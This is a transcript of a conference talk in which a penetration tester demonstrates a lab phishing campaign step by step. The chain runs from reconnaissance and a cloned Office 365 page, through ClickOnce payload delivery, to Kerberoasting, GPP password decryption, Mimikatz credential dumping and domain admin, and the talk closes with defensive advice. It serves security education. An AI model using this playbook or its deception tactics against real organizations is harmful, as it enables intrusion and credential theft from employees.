Attackers Perspective: A Technical Demonstration of an Email Phishing Attack

All right, cool. All right. Well, this is Attackers Perspective, a technical demonstration of an email fishing attack. So, my name is Zach Davis. Uh, I'm a senior penetration tester at a really cool company uh called Proivity. We got a booth set up next door. Uh, we do lots of different projects within the information security realm. So, definitely stop by and talk to us. I'm a penetration tester. Uh, I've been doing this for going on four years. Um, I also have a background in IT audit um, and that side of the security world as well. Um, I want to talk briefly about my inspiration for this presentation. Um, so when I first got into security and I

was going to my first Defcon, my first bides events, I saw all these really, really cool tools that people were dropping, awesome techniques that you can use on a penetration test. But due to my limited experience, it was difficult to see the big picture and how you could tile these tools together. um you know for for a penetration test from start to finish to go from you know googling an organization's uh domain name to domain administrator on the on their network. So basically that's what I'm trying to do with this presentation. I want to show you how I run email fishing campaigns um on a daily basis uh and how I I do exactly that. Um so quick

overview I'm going to this is going to be pretty high level but I'm going to show you some recon techniques for targeting an organization. Uh, I'm going to show you how to actually create a spear fishing email. I'm going to show you one of my favorite methods of payload delivery. Um, we're actually going to exploit a workstation. I have a whole or a mini Active Directory domain uh with workstations, servers, and a domain controller set up on my laptop. Um, so we're going to compromise a workstation to gain an initial foothold. Uh, I'm going to show you how I, uh, do network enumeration internally to stay under the radar, uh, and be a little bit

quieter using native Windows functionality. Um, and then I'm going to show you techniques for moving laterally and elevating privileges. And we're going to try and get domain uh domain admin on my little network. Um, so everybody take a second, pray to the demo gods. This is a really demoheavy presentation and more than likely something's not going to work uh given how this morning's gone so far. Um, so quick background. I did not develop any of the tools I'm demonstrating today. Um, I tried really hard to credit the right people, but if I credit the wrong person or say something dumb, please let me know. And a little bit about the target as well. Um, I've done this talk or variations of

this talk at at smaller industry conferences uh several times before. And in the past, I always wanted to choose like a realistic target. So, I thought I'd always chose the the venue I was presenting at, whether it was a conference hall or casino, hotel, whatever it was. So, I was originally going to do that for this presentation, but I decided since there's probably going to be Drexel students here, I shouldn't uh teach them how to hack into Drexel. Um, so the the target's going to be completely fictional. Um, not all the pieces fit together quite right, but I think it'll make sense anyway. Um, so, uh, let's get started. So, one of my favorite uh scenarios when

I'm going after end users is sending them a message requesting them to visiting a site and I impersonate one of their network administrators. Uh more than likely there's some of those network administrators sitting in this room right now. Um so, what we're going to do is we're going to impersonate a network or system administrator. We're going to request a user to visit what looks like a trusted site. Um they're going to authenticate to this trusted site and then they're going to be given a security update to install on their computer. uh in reality when they log into the site it's actually going to be my site their credentials are going to be captured and when they run the update uh

it's going to be my exploit code. Um before we get into that we need to do reconnaissance and figure out uh you know what how we're going to attack and how we're going to draft our fishing campaign. Um this is definitely the most important step on a penetration test. The more information you know about the target, the better off you're going to be. Um there's some really simple tools that I find that work really well. Um, I've been using the harvester since literally my first day uh on my first pen testing internship. Um, it's a tool coded by Christian uh Marcherella of Edge Security. It basically uh you feed it a domain name and it scrapes Google

for um email addresses and domain information. So, I just wanted to show really quick um the harvester. Hold on a second. really small. Does that look all right, everybody? Bigger, smaller? We're good. All right. So, the harvester is a little Python script. You might have seen it before. Um, but basically, you feed it some of these flags. Um, basically, you do - D for the domain. Um, dash L is the number of Google uh results you want it to search through. I usually do about 2,000 and then dashb you supply it uh the the public available data source you want to um go through. So as you can see there's Badu, Bing, uh Google, LinkedIn, Twitter.

There's a whole bunch of different ones you can try. I always just use Google. Um I created some fake results to show you how what actually comes out of this. Um so basically if you look here we have our harvester results. um it harvested all these different email addresses from Google and it also got us all these different host names and the associated IP address. Um so basically what we have now is we have a potential list of targets to send our fishing email to and we also have some information about the organization's external infrastructure. So we can look through that, try and find a website, something trusted that we're going to be able to create a clone

of and try and direct our users to um so we can steal their credentials and and shell their computer. Um there are some better tools out there. Oh, let me take a quick step back. Um a lot of times I also tie in who is lookups just because it seems like a lot of network administrators like to put their name right on the domain registration information even though it's really easy to hide that stuff today. Um, so if you're on the blue team side, it's definitely something to think about. If I can go and just do a look up on your domain and the network administrators right there, then I'll do some LinkedIn and Google

hacking, figure out uh, you know, who else works for the organization and if you're a good person to spoof as, and then I'm going to try and send my message as that administrator. Um, data.com is another really good data source. Uh, you basically create a a free account. You go there, plug in an organization's uh name and it will give you a whole list of employees and a bunch of other good stuff. Sometimes you can get phone numbers and things like that as well. Um there's also some better tools out there for doing reconnaissance. the reconj uh reconng framework coded by Timothy Tomes Landmaster 53 check out his blog it's really awesome a lot of cool stuff um

and if you haven't heard of showdan um that's more for the host side of things so you can go and plug in an IP address get a list of ports and services um a lot of times vulnerable systems again if you're on the blue team side uh definitely recommend going and and typing your own uh IP addresses in there and see what types of information attackers have on on you I know like a lot of bots botn nets will use information from showdan when they're um trying to find their targets to spread their botnet. Um so to our fishing site, I kind of mentioned before, I like using generic portals, OWA, VPN, Office 365. Um these are trusted portals that a user

authenticates to on a daily basis. So there's a degree of uh familiarity there and they're more likely to enter their credentials. Um, and you have the added bonus. When I create a fishing site, I have them log in, then I feed them my malware. So, if I successfully shell their system, I already have their password, which is a pretty good place to start uh if you're trying to do privilege escalation on the internal network. Um, another one I've been using a lot lately is a is a rewards site. Um, basically I I send a message telling employees that that they won something. Uh, when people think they won something, they do not think clearly. Um, you know, I I sent one

where I I I said they won a bunch of Omaha stakes and we ran it for like a few days and like literally like a month later I was getting angry emails to the uh to the inbox I had set up because people wanted their stakes. Um, so definitely a good one uh to use as well. So I set up this fishing site. I just went for something really generic uh which is Office 365. This is actually hosted on my Cali instance. Literally all I did to set this site up is I did a quick Google hack for an Office 365 portal. I did a rightclick save as, grabbed the files, threw them up on my

web server, and this is this was the result. Um, sometimes it's not quite that easy. you'll have to tweak the code a little bit and honest and and um if we were going to use this for a real uh fishing campaign, you'd have to add some PHP into the form so that you're going to capture the credentials um and get everything to work right so you have that information when you're starting your uh escalation. But for our purposes, this will work just fine. Um before we jump into that, I want to talk about the fishing email really quick. So, with fishing emails, uh the biggest problem is always bypassing spam filters. Um there's a couple different

ways you can do this. When I first got my start and penetration testing, all we would ever do is just spoof message headers. Uh this is getting harder and harder to do every day um as spam filters are getting better. But if you're not familiar with uh spoofing message headers, basically by man manipulating the way you connect to an email server, the information you supply for the headers and the information you supply for the body of the message, you can often times send messages to like an internal employee and make it appear to originate from another internal employee. Or maybe you can manipulate the domain uh very subtly so that you know again it's going to look like it's

coming from an internal employee. Um I don't do this very much anymore. uh it's hard to do and honestly it's just easier to go buy a domain. Um but when you buy a domain, you kind of open yourself up to some new problems. So some of the new uh newer spam filtering solutions are starting to get better and they're doing things beyond your typical SPF lookups and things like that. So what they do is uh basically every domain is categorized and um this is something that happens over time. Um, so if you if your domain has a malicious any malicious content or it's been reported with any malicious content, it's going to get dropped by

the spam filter. Another thing it does is if it's been registered within the last few days, um, it's going to get dropped by the spam filter. Um, if you're on the blue team side, this is actually really great solutions. I highly recommend it. It makes my job as a penetration tester a lot harder. Um, if you're on the red team side, there should be some new tools coming out. They're going to help you get around this pretty soon. um at DerbyCon 6 this year. Uh it was actually Will Schroeder and Sean Medcaf in their Evo Corp talk. Definitely recommend checking that out if you haven't seen it. Um they talked about a tool that Andrew Robbins is

dropping um called Eminent Domain. And basically what that allows you to do is scrape Google um and other information sources for recently expired domains that have been previously legitimately registered. So you could find a domain that might fit your uh campaign that's recently expired. you can pick it up. It hasn't been registered for the first time, so it's going to bypass that first level of timebased uh spam check. And then it's also probably been already categorized as safe and it takes a while for these things to update. So you might be able to get your message through using a recently expired domain. Um, another problem is if you're including a link in the message like

like I typically do, um, solutions like Proof Point are starting to try and filter and obuscate those links. So we're always looking for ways around that. I found that simple is sometimes uh the better answer. I was working on a pen test a few weeks ago where they had a solution that was basically just kept stripping out my links, sending my message to uh spam. And what I finally did was I typed up my message. I took a screenshot of it, deleted all the text, stuck the screenshot in the message, and then I hyperl directly to the image. So it still looked like an email, but all it was was one big image, and the link

still worked and went right through to the user's um inbox. Uh, no, the link wasn't stripped out. Everything worked just like I wanted. So sometimes simple answers like that work really well. Um, and finally, presentation is everything. Um, so the better your message looks, uh, the better off you're going to be. Um, and I'm not like it it doesn't have to necessarily make sense if you're targeting end users. If you throw security buzzwords in there, um, it usually works pretty well, but like making it look really nice and clean, uh, is really important. So, real quick, the message that I drafted, the mock message, um, this is based on a variation I use all the time. So, it

just says, can you really see that? Um, Office 365 security improvements. The Office 365 webmail portal has been updated to include new security features. All new employees must confirm access within the next 24 hours. So, we're creating essential urgency. They need to do this or they're going to lose access to their email. Please use the following link to log into the portal and download the update so corporate IT can confirm the installed enhanced security features. That doesn't really make much sense, but uh I you know throw enough buzzwords in there and they'll click on it. After logging in, click on the update button to automatically download and install the update. Um and then I throw a uh you

know logo in there and I always put whatever email I'm sending uh the message from. Um because usually when I buy a domain, you can set up a free webmail inbox, you know, set it up as help desk or the admin you're spoofing as and include that down there. People will always reply to the attacker, I've found. And a lot of times I'll send an email message and they'll reply back, "Is this a fishing email?" And I respond back, "Of course not. Install the update. You need this." Um, so there's our message. Um, so the parts are starting to come together. Before we go any further, I want to talk really quickly about just my network setup. So basically, we have

a Kali Linux uh VM, a Windows 7 VM, and then two servers with Windows Server 2008, a domain controller, and the map server. Um, they're all sitting on the same virtual network on my Mac, but we're going to pretend there's a firewall in between Cali and everything else. So, I'm not going to communicate directly from Cali to the domain controller or the app server. All we're going to do is we're going to shell workstation 01 and all traffic from that point on needs to be funneled through that session uh in our imaginary firewall just like a real fishing campaign. Um, so now let's get on to the cool stuff. Payload delivery. Um, so one of my favorite payload delivery methods

is click once. Has anybody ever heard of Microsoft Click Once? Know what that does? Couple. So basically what Microsoft Click Once is, it's a tool that Microsoft develops that allows administrators to have end users install updates and make configuration changes. Um, one of the cool things about it is a lot of times you can get it to run with elevated privileges. Um, so obviously someone figured out how to weaponize this. Uh Ryan Gandrew uh dropped the weaponization of Click Once at I think it was Besides Las Vegas 2015. Um he's got a really awesome blog post on this and if you haven't checked out Netspy's blog, there's a lot of really cool stuff on there as well. So I definitely

recommend hitting it up. Um so basically with click once you're having Microsoft run your code. Um what you're going to make is a net uh console application written in C. Uh there's a lot of different things you can do with it. Um when Ryan originally set this up, he had it run an executable file uh generated by the Veil framework. Um it's since been uh modified. You can, you know, you can run PowerShell. You can do a lot of different things. And what's awesome about Click Once is you're running within the context of a trusted Microsoft binary. So any code that you feed through it um is going to be running in that trusted space. And a lot

of times application whitelisting solutions will um will be bypassed. Um so a couple different things you can do. What I'm going to be doing is just running a straight PowerShell command. So my C is basically just going to open up a command prompt and execute a command for me. Um but there's other cool cooler things you can do. I would definitely uh recommend checking out Justin Warner 6ub. He's got a post on integrating his sharp pick tool um into click once. And if you haven't heard of Sharp Pit, basically it's a method for bypassing and uh application whitelisting with PowerShell. Um so you use the system uh management automation DL to basically spin up a PowerShell run

space and even if they're blocking PowerShell.exe, you can still get all the functionality of PowerShell um through that method. So really cool. Definitely recommend going and checking out that blog post. Excuse me. So, I just want to show you the code snippet really quick. Um, I literally grabbed this. I'm not a developer. I'm a terrible developer. This is directly off Stack Overflow. I Googled C run PowerShell C and this is what I got. Um, basically all I did was swap out this command right here, which I'll be talking about in a second, but all we're really doing is opening up a command prompt that's hidden, feeding it some arguments, and starting the process. Uh it's just that simple. So when you can

when you uh set one of these up, it's going to and you compile the program, it's going to create a bunch of different files. Um all you have to do is zip them up, throw them on a web server, and then you link to an application file um that's set up. So I'll just show you my web server really quick.

Um, so basically besides that application, that's the application that's going to run setup.exefc. Um, I don't even know what that does, but does something with uh everything. And then there's some other application files. Like I said, I don't honestly know what they do, but I know that it works. Um, you can go read up more on click once if you want to figure that out. Um, so that's what you're going to get once you compile. Um, but before we get this going, we need to talk a little bit about our command and what we're actually doing there. Um, so I'm actually I'm going to run through all the tools I'm going to use and then I'm

going to do the demo at the end. Um, so what we're going to be using for C2 or command and control with this scenario is Empire. If you haven't heard of Empire, go check it out. It's an amazing tool. Um, really fun to play with whether you're on the red team or the blue team. It does a lot of cool stuff. Um they just dropped uh the second the second iteration of it version two which has a lot of support for OSX which is the Python portion of it. Um this tool is done by the Varys group adaptive threat division. There's a lot of other contributors. Uh Harm Droid does tons and tons of work on it

and I know there's other ones. Go check out their website and they've got the credit for everybody. Um but it's a PowerShell and Python post exploitation agent. Um it does everything. Uh if you've been on the red team side uh for any amount of time, you know about all the different PowerShell attacks. I'm sure you've been to the PowerShell mafia GitHub. Um well, a lot of the amazing tools that have been developed using weaponizing PowerShell in the last few years have all been direct uh baked directly into Empire. Um so basically you don't have to, you know, mess around with the crappy syntax and pulling down scripts and all this. If you can get an

Empire agent on a system, you can use all this awesome uh different PowerShell tools uh to enumerate, exploit, run shell code, do all sorts of awesome stuff. Um so the ones we're going to be looking on today or looking at today uh few modules is uh Power View. So we're going to be using Power View functionality within Empire to enumerate the network. Get GPP. Uh if you don't know what group policy password files are, I'll go over that when we get to it. Um but basically we're going to use it to extract clear text passwords from some group policy files. Then finally we're going to talk about Kerarost. Um actually going to talk about that right

now. So Kerrosost is a tool uh or a more of a technique um that was dropped by Tim Medin in like 2014. Um used to be a fairly manual process but it's been um automated over the years. Um there's Harmjoy and Mubix have really really awesome blog posts on this topic. Uh I read them extensively when I was developing this. So I definitely recommend going and checking this out. Just want to make sure. Um so basically what you're doing is exploiting service principle names and their associated Kerros tickets when within active directory. So a service principle name and this is straight from Microsoft is a unique identifier of a service instance. SPN are used by Kerros to authenticate

associate uh or to associate a service instance with a service loon account. Um so and then this is straight from Moveix's blog. Basically you're mapping a service running on a server to an account it's running as so that it can do or accept Kerros authentication. Um so basically when you when you have running service accounts and you tie it to a domain user it needs to be able to uh authenticate to Kerros. That's what the service principal names are used for. Um, what's cool about uh these this technique and and pulling tickets from service principal names is any domain user can request a serveros ticket uh for any service and domain trusts are in scope. So if you have a

forest, you have domain A, domain B, and uh you have a domain user on domain A, you can request, and there's a trust relationship between the domains. You can request uh SPN tickets for um domain B, which is pretty cool. Once you have the tickets, you can pull them down and crack them offline. With Empire, it sticks them right into the right hash format for you. You can choose Hashcat or John the Ripper. Used to have to run some scripts to convert them to the right uh format. Um, cool thing about Kerra, uh, or I mean a cool thing about these accounts, too, is they're frequently configured with bad passwords that never change and, um, a lot of

times the permissions are misconfigured with service accounts as well. So, they'll be running as domain admin or at least maybe have local admin on some servers, things like that. Um, so we're going to pull some Kuros tickets in a second. But first, I want to talk about a little bit about Metas-ploit. If you don't know what Metas-Ploit is and you're in the security realm, you probably been uh living under a rock. It's an exploitation framework developed by HD Moore. Uh, does a lot of really cool stuff. I honestly don't use it for exploitation very much. Um, what I mostly use it for is C2, uh, the auxiliary modules and post exploitation. Um, so interpreter shell

baked into metas-ploit really awesome. A ton of functionality baked right into it for post exploitation. Um, the auxiliary modules uh are some of them are really good. that I used to use use them a lot more, but now a lot of that um functionality has been baked into different PowerShell tools, but I still like to keep this in my back pocket if I need it. Um my favorite thing about it to use Metas-loit for is tunneling. It just makes it really, really easy. It's really easy to forward ports uh and pivot through systems basically to attack other systems. So, um that's what we're going to be using it for today. Um and we'll show that in a

second. Finally, quickly want to talk about Mimiats. Again, if you don't know what Mimi Cats is, you've probably been living under a rock. Um, it's tool developed by Benjamin DePlay or Gentle Kiwi, straight from his blog. It's a little tool to play with Windows security. If you know what it is, it's a lot more than a little tool. Um, does a lot of really cool things. You can extract plain text passwords from memory. Uh, you can extract hashes, tickets, launch past the hash attacks, launch past the ticket attacks, do golden ticket attacks. Um, there's also something called silver ticket attacks that I've just discovered. I got to read up on that. Um, but basically a ton of

cool stuff that you can do with Mimiat. So, we're going to be uh demonstrating that one today, too. So, now we're ready for the fun stuff, the demos. Let's all hope this works. Um, first thing I want to show you is Empire. If you haven't used Empire, it's a really, really cool tool. Um, basically with an Empire, there's modules, which are going to be your power view, invoke shell code, all the different things you can do with it. Then there's listeners, uh, pretty much the same as an exploit handler. If you're familiar with metas-ploit, it's going to listen for incoming connections. And then there's agents, uh, which is is, you know, is your, um, basically the beacon that's going to

connect back and forth and send your commands up and down, uh, similar to an interpreter shell. Um, so just set up listeners. I already have one set up. Um, you basically just type listeners, then I think it's use listeners. Um, show you some info on it. Basically, all this is already set and ready to go. The only thing I did was change the port to 8080 because we're already hosting our website on port 80. So, we needed to choose uh an open port. Once you have that, you just type execute. You'll start your listener. Once you have your listener, uh you can type launcher and then the um the um the development framework you want to use,

either Python or PowerShell. Uh when you do that, uh I forgot the listener name. It's going to give you this big long command. This is what I stuck with in my click once um my click once code. Uh, basically we're just going to open up a PowerShell window, do some there's some bypass flags for execution policy and things like that. And then we're going to feed it this big long encoded command um that's going to be a script uh that's going to send back our agent. Um, so we have that that's within our click once. Um, I was going to actually send a fishing email, but it didn't want to go when I was testing right before this.

So, we're just going to go and look at um our user's inbox. So, this is our user Bob. uh he is a end user on this network. He's not very smart. So he's going to run and uh click on this fishing email. So basically we're here we are Office 365 site. He logs into this every day. This looks good. Doesn't want to lose access to his email. Just sign in. And we're going to click update right here. Um I just realized I lost my screenshot. I had an issue with the PowerPoint this morning, but it's called Click Once. In reality, it pops open a box. Uh if you ever installed Chrome, uh I think pretty recently they started

doing this, but Chrome is installed with Click Once. And basically, um you it pops open a box and it just gives I think it says unknown publisher, the name of the application. It says, "Do you want to run this?" You click run, it's going to run your code uh for you. Um I was going to show a screenshot, but like I said, I I I missed that. Um go Google it. It's right there. So, we ran our code. Now, we have a new agent. So, we can type agent and we've actually got two of them. I'm not sure why. One of those I must have been testing, but we're going to interact with the second one, the

newer one. Um, so we're going to rename that so it's easier to work with. Call this Bob. Now, we can interact with Bob. Uh, type info. We get a bunch of system information. Uh, and now we're ready to start actually doing some network enumeration. So, like I said, we're going to use PowerShell. Um, for that, uh, I don't remember the name of the modules. I just want to know I want to use Power View. So, we're going to search module Power View, and it's going to give us all the modules, uh, within the PowerShell or Power View um, folder. So, there's all sorts of really awesome stuff you can do. Uh, look through these. If you're familiar with Power

View, pretty much everything's baked in, I think. Um, but we just want to do some general enumeration. So, the first thing we want is um a list of users on the network or I mean a list of computers on the network. So, we're going to go use module uh situational awareness network power view get computer. There are some options you can set. We don't need to set any of them. We're ready to go. So, we're just going to click run. Should start a job for us, and it's going to kick us back all the computers. Keep in mind, there's only three computers on my network, but if you run this in a 50,000 node network, you're going to get a lot of

output. So, you want to be able to output this to a file so you can parse through it later and access it as you're trying to elevate privileges. Uh, but we got our three servers, DC01, App Server 01, and Workstation 01. Uh, next we want to get an idea of the types of users we have. Um, so we're going to use another Power View module. Um use module situational awareness network power view. Get user. Same thing. Don't need to set anything. We're going to run that. Again, if there's a lot of users on the network, you're going to get a lot of output. You're going to want to stick this out to a file. um that

ran. So if we start looking through this list, we can see the different users and this is a little messy, a lot of information there, but um so like I said, best to output a file so you can parse through it. So here we have our administrator account on the domain and see it's member of the domain admins group. Um let's scroll down a little bit farther. There's some built-in Microsoft accounts in there, I think. Um we got this app server admin. Uh, looks like it's in a server admin group, so that might be a good account we might want to target. Down here, we've got Bob. Uh, we already know about Bob, so we're not

worried about that. Uh, here's something interesting, though. We have a service principle name for an MSSQL account. Looks like there's an account called SQL Server, uh, and it's running on App Server01. So, um, definitely want to keep that in our back pocket, uh, and and check back on that later when we're trying to eleate privileges. Um, but before we go and uh check out Keraros, I want to show you my all-time favorite active directory misconfiguration. Um, which is get group policy password file. Um, if you don't know what that is, basically when you create group policy files and associate uh, well really when you create any group policy file or group policy object, all sorts of configuration files

are created and stuck on the sysball share of the domain controller. So when a client boots up, it's going to check into the domain controller, check those configuration files to apply the settings. If you create a GPO that has a password associated with it, like let's say you push out a local admin password to all your clients and there is a you know there's a password there, an encrypted version of that password gets stored on that share. Um, for some reason Microsoft in their infinite uh wisdom released the key that they use to encrypt those passwords. Um, I've heard it was a mistake. I've heard they did it on purpose. I I don't really know. But

uh basically with a little Ruby script, you can grab those passwords right out of the sysfall share, decrypt them, and sometimes you have local admin. I found domain admins. I found all sorts of good passwords. Um you can do this with a manual process. There's a a PowerShell script you can run to do it or since we're using Empire, it's baked right in. So let's do that quick. Um BPP. So use module privilege escalation GPP. Again, we don't have to set anything with this. It's just going to go check, scrape the passwords, decrypt them for us, and put them to the

screen. So, as you can see, it went and it found that there's a local admin password that's been pushed out to the clients, and it's got this local pass right here. Um, and it shows gives the path where it found it. It's in a group.xml XML file on our domain controller. Um, so if we wanted to with uh Empire, we could just uh, you know, start passing that around, see if we could get access to any other systems, but I want to show you some tools outside of Empire. Um, I didn't want to just do an Empire demo, but I very well could have. Seriously, go check it out. It does so many cool things.

Um, so, uh, before we use that local pass, I want to check out that service principle name I found and show you guys how Kerros works. Um, we are going to use Empire for that. Um, so again we're going to search module. Why is this? Oh, I got to do

back Kerarost. Um, so we're going to use that [Music] module credentials Kerarost invoke Kerost info. Um, so the only thing I set here is the output format. I think by default it's on hashcat. I have John installed on my Mac. So that's what I'm going to use for password cracking. So I just changed the output. We're going to run

that. Starting another job for us. As you see, it kicked out a nice Kerros ticket for our SQL service account. So now we see if that has a bad password. See if we can crack that offline. Um, so I already copied this over. Oops, that's not what I want to do. So we have our hash here. Um, I have a word list that has the password in it because I want this to go quick. So we just got to uh spin up John. I really need to put this in my path. John's working. So, we're just going to specify our hash file d-word list equals to list. Going to run that. As we can see right here, we cracked our

password. Um, so now we have the clear text password for this cur uh service account. Uh, it's a domain account, so we can probably log in with it unless they've specifically disabled interactive login, which you should definitely do for all your service accounts. Um, so I want to try an RDP because I like using the guey. So we need to figure out a way that we can tunnel through this workstation we exploited in order to RDP to other systems on the network. Um so that's where metloit comes in. Great tool for tunneling. Um so we need to set up a handler to receive our session. Um I've already done this. So basically I just give the IP

address uh the port to connect back on. Since we're going through a firewall I want to use 443. Uh it's pretty unlikely that outbound 443 is going to be blocked. So this way we'll avoid any egress filtering rules that might be in place. So we're going to exploit that and start a job. And so we're good to go there. So now we need to find a way to inject our shell code. Once again, you can just inject shell code with Empire uh really really easily. Once again, the search function is really awesome. I probably should have memorized these by now, but I keep doing it. And we're just going to search shell code. And right here, uh, we have

code execution, invoke shell code. So that's what we're going to use. Use module code execution. Invoke shell code info. So we're need to tell it where to connect back to. Um, so we're going to set the LHOST 172.16120, which is our CI box. Set the L port 443. Um, one more time. Info. We already have the reverse HTTP uh HTTPS um payload ready to go. So, this should work. We're just going to type execute and see if we get our interpreter session. And we did. So, now we have a session uh our interpreter session to Bob's workstation. So, we can interact with that. PS to make sure it's live. We can see processes, so we know we're good.

Uh, so now we need to set up our port forwarding since we're going to tunnel through this. Um, so the port forward command is super easy. You only need a couple options. Um, what we're going to need is the local port from our Cali instance that we want to forward. Uh, the remote port we want to connect to. So on the system we're trying to we're going to pivot through the interpreter session and hit another system. So we need the port we're going to connect to there. Since we're doing RDP, it's going to be 3389. And then finally the remote uh host we're going to connect to. So we're going to do port forward. We're

going to add a route. Um so -L the local port to listen on. We're going to do 3389. Remote port to connect to. Again it's going to be 3389. Why do I keep doing that? And then the remote host which is going to be our app server. Uh over here. Um sure that thing's still up. 172.16211 uh.133. Our domain controller is going to be 134. So we have that set up. Now all we have to do to connect to that system is um oops our desktop to 127.0.0.1. So remember we're forwarding our local port through the interpreter to the remote port on the system we're trying to connect to. This has been giving me trouble, of

course. Thank you, Matthew. Uh, so we got to flush that out. 33 89. Try this one more time. And there we go. Now we're RDPing through our interpreter session to the system we want to hit. Uh we need to log into our domain which is fake STSU and our account is SQL Service. Uh we're going to type that password [Music] in and boom, we're already PED in. Um so we're going to hope that there's uh some administrators logged into this system. I'm getting a little short on time, so I'm just going to tell you there are administrators logged into this system. So, uh, we need to find a way to run mimiats on this system. I don't like

touching disc. There's no AV on this computer, but when, uh, at all cost, always avoid touching disk on a penetration test. So, we're going to use PowerShell, the traditional method, um, to run our code. Um, basically, I've hosted an invoke Mimiat's PowerShell script right here. We're going to use a command to uh a PowerShell command to pull that down from our system and um we're going to pull it down from our our web server, inject it right into memory without ever touching disk and run it. We got to be running as an administrator um for mimicats to work. So, I've got that command here. I think got all my passwords there too if you guys take a look

at. So basically what we're doing in here is theex and I realize that's really small. Invoke inspection uh opening up a new object. We're going to download a string which is going to be our script that we're going to run uh invoke meats and dump creds.

Let's hope this works. Had trouble with this too, so it might not work. Oh, it worked. So, now we can pop back up through here and see what kind of creds we got. Um, so right there we got our SQL password again. Not too concerned with that. But right here, uh, we see that we got our administrator, uh, who's the main administrator on the network. So, I I was going to RDP through, but again, I'm running a little short on time. So, we're just going to log into this system, show you that the creds work. Um, is this the right one? Here we

go. Type our password. I am a crafty admin. And screw that up, of course.

running out of time. I can't type the password, but I guarant I tell you it works. So, now we're domain administrator on the network. We've gone uh all the way up there doing a couple different techniques. Um just want to recap really quick, talk about some remediations quickly. Don't open Spotify.

Um, so in summary, be aware of all the information you have out there online about your organization. If you're on the blue team side, you know, use hacking tools. Go see what the hackers are going to do to try and enumerate information about your network and then uh try and protect yourself. Always be tweaking your spam filters. You cannot set up a spam filter and just leave it forever. You should constantly be updating the definitions, updating malicious uh domains, and and testing it to make sure that it actually works. Never stop training your end users. Not going to lie, you're fighting an uphill battle here. Uh but the more visibility they see into fishing attacks, and if

you reward your users for reporting fishing attacks, the better off you're going to be. Disable click once if you're not using it, which most people don't. Uh you can it just disables some trust relationships within Internet Explorer, and it should prevent it from running. Um, don't use SPNs for service accounts. There's managed service accounts uh within uh Active Directory now you can use that work much better. They lock down the authentication. Do some other things to make them more secure. But I have heard there's issues with that too. So do do your research. If you are going to use SPN's uh assign strong passwords, do not use group policy to push passwords. Uh there's actually a

patch push now that doesn't allow you to do this, but we still almost on a weekly basis find organizations with stale passwords sitting in there um sitting in the sysball share the domain controller that might be a few years old, but they're still valid somewhere. Um and privileged account management. If that uh administrator hadn't been logged into that server, I wouldn't have been able to mimic cats his password. Um privilege account management is really really big. There's a, you know, I really recommend doing an audit of all your administrative accounts on your domain and, you know, figure out how you can, uh, you know, get rid of those as much as possible and limit their exposure on

the network. Um, finally, I just have a list of all the tools I use. Um, so since I'm running out of time, is there any questions? All right. Well, thanks a lot. [Applause]